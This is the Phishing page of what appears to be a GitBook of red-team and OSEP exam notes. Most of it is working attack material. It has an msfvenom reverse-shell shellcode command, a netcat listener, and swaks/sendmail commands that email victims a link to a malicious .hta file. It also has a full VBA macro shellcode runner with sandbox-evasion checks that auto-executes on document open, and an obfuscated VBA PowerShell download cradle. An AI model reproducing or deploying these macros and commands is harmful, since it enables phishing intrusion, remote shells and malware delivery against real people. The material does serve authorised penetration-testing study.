theAwful
  • Introduction
  • INTERNALS
    • Responder
      • NBNS/LLMNR
    • mitm6
    • Password Spraying
    • CME/NXC Cheatsheet
    • Kerberoasting
    • AS-REP Roasting
    • Dumping NTDS
  • Metasploit Payload and Listener
    • Encoder
    • Word Macros
    • Payloads
      • Earlybird
    • Metasploit Modules
  • OSEP Cheat Sheet
  • OSEP Challenges
    • Challenge 6
  • C2
    • Sliver
  • Privilege Escalation
    • PowerUp
    • Privilege Escalation
      • Internal Privilege Escalation (Linux)
  • Windows Local Recon
    • SQL Server
    • Application Whitelisting and Credentials
  • Linux Local Recon
  • File Transfer & Execution
  • Phishing
  • Ansible/Jfrog
  • Pivoting
  • Pass-the-hash
  • Remote Access
  • Post-Exploitation
    • Add User
    • AMSI, CLM, AppLocker
  • Credentials
  • Lateral Movement
  • Domain Enumeration
    • Users and Computers
    • ACLs
    • BloodHound
    • GPO
    • Trusts
    • User Hunting
  • Active Directory
    • Domain Recon - Kali
    • Domain Recon - Windows
    • Trusts
    • ADCS
      • ESC3
  • Web Application Testing
    • Host Headers
    • WAF Bypasses
    • Template Injection
    • Prototype Pollution
      • Client-side Prototype Pollution
    • Autorize
    • SQLmap
    • SSRF
    • File Uploads
    • Command Injection
    • XXE
      • Blind XXE
    • CSRF
    • XSS
      • XSS Methodology
      • Bypass WAF
  • MOBILE APPS
    • iOS
      • Install Tools
      • SSL Killswitch
    • Android
      • Install Tools
      • Setting up Burp
      • Red Teaming
  • Exploit Dev
    • AMSI Bypass
      • AMSI OpenSession
      • AMSI ScanBuffer
    • VBA Obfsu
    • APC Injection
    • EarlyBird Injection
  • DFIR
    • Malware Analysis
    • Memory Analysis
      • Volatility
    • Registry Analysis
      • RegRipper
    • Behavior Analysis
      • ShellBags
      • UserAssist
    • Filesystems
  • VISUAL STUDIO
    • Tricks
  • Scripts and Tools
    • Grep IPs from DNS ping
    • OSINT.sh
Powered by GitBook
On this page

Phishing

PreviousFile Transfer & ExecutionNextAnsible/Jfrog

Last updated 1 year ago

Simple VBA Shell

nc -lvnp 8080  --- listener

BadAssMacro

Download from the above repo.

  1. Create the raw shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f raw -o shellcode.raw

  1. Copy the out.txt into the Word file

.\BadAssMacrosx86.exe -i shellcode.raw -s indirect -p no -w doc -o out.txt

Send the Email

swaks --body 'click me http://192.168.X.X/file.hta' --add-header "Really: 1.0" --add-header "Content-Type: text/html" --header "Subject: Important" -t victim@corp.com -f attacker@corp.com --server 192.168.X.X
sendmail -f attacker@email.com -t victim@email.com -s 192.168.x.x -u "Subject" -m "body"

Word Macro

  • VBA Shellcode Runner (x86)

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr
Function mymacro()
Dim allocRes As LongPtr
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
Dim t1 As Date
Dim t2 As Date
Dim time As Long
allocRes = FlsAlloc(0)
If IsNull(allocRes) Then
End
End If
t1 = Now()
Sleep (2000)
t2 = Now()
time = DateDiff("s", t1, t2)
If time < 2 Then
Exit Function
End If
buf = Array(...)
For i = 0 To UBound(buf)
buf(i) = buf(i) Xor 188
Next i
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Sub Document_Open()
mymacro
End Sub
Sub AutoOpen()
mymacro
End Sub

  • VBA PowerShell Download Cradle

Function MyMacro()
Dim Apples As String
Dim Water As String
If ActiveDocument.Name <> Nuts("...") Then
Exit Function
End If
Apples = "..."
Water = Nuts(Apples)
GetObject(Nuts("...")).Get(Nuts("...")).Create Water, Tea, Coffee, Napkin
End Function
Function Pears(Beets)
Pears = Chr(Beets Xor 188)
End Function
Function Strawberries(Grapes)
Strawberries = Left(Grapes, 3)
End Function
Function Almonds(Jelly)
Almonds = Right(Jelly, Len(Jelly) - 3)
End Function
Function Nuts(Milk)
Do
Oatmilk = Oatmilk + Pears(Strawberries(Milk))
Milk = Almonds(Milk)
Loop While Len(Milk) > 0
Nuts = Oatmilk
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
S3cur3Th1sSh1t Reverse-Shell
BadAssMacros
BadAssMacrosx86.exe